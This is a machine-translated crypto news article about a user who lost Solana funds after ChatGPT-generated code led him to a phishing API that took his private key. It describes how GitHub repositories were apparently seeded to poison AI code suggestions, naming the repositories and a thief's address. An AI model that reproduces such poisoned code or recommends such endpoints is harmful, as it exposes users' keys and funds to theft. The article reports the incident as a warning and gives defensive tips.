"AI poisoning" is hard to prevent, can we still use ChatGPT to write code?
This article is machine translated
Show original
Recently, a user who was trying to develop an automatic pinning bot for pump.fun sought code assistance from ChatGPT, but unexpectedly encountered online fraud. This user, following the code guidance provided by ChatGPT, visited a recommended Solana API website. However, this website was actually a fraud platform, resulting in the user losing approximately $2,500.
According to the user's description, a part of the code required submitting the private key through the API. Due to the busy operation, the user used his main Solana wallet without careful review. In retrospect, he realized he had made a serious mistake, but at the time, his trust in OpenAI made him overlook the potential risks.
After using the API, the scammers quickly took action and transferred all the assets from the user's wallet to the address FdiBGKS8noGHY2fppnDgcgCQts95Ww8HSLUvWbzv1NhX within 30 minutes. Initially, the user did not fully confirm the problem with the website, but after carefully checking the homepage of the domain, he found obvious signs of suspicion.
Currently, this user is calling on the community to help block the @solana website and remove the relevant information from the @OpenAI platform to prevent more victims. He also hopes to investigate the clues left by the perpetrators and bring the scammers to justice.
Scam Sniffer's investigation found a malicious code repository, the purpose of which is to steal private keys through AI-generated code.
• solanaapisdev/moonshot-trading-bot
• solanaapisdev/pumpfun-api
The GitHub user "solanaapisdev" has created multiple code repositories in the past 4 months, attempting to guide AI to generate malicious code.
The reason for the user's private key theft is that the private key was directly sent to the phishing website in the HTTP request body.
Slow Mist founder Yu Chao stated that "these are very unsafe practices, all kinds of 'poisoning'. Not only uploading private keys, but also helping users generate private keys online for them to use. The documentation is also written in a pretentious manner."
He also said that the contact information of these malicious code websites is very simple, with no content on the official website, mainly just documentation and code repositories. "The domain was registered at the end of September, which inevitably makes people feel it was premeditated poisoning, but there is no evidence that it was intentionally poisoned for GPT, or that GPT actively collected it."
Scam Sniffer's security recommendations for using AI-assisted code creation include:
• Do not blindly use AI-generated code
• Always carefully review the code
• Store private keys in an offline environment
• Only use trusted sources
Source
Disclaimer: The content above is only the author's opinion which does not represent any position of Followin, and is not intended as, and shall not be understood or construed as, investment advice from Followin.
Like
Add to Favorites
Comments
Share